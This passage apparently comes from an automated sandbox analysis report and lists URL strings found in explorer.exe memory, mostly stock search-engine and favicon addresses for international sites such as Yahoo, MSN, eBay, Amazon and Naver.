          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 0000000D.00000000.2120734342.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 0000000D.00000000.2119444846.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000D.00000000.2111776587.00000000002BB000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000D.00000000.2117838485.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoz
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
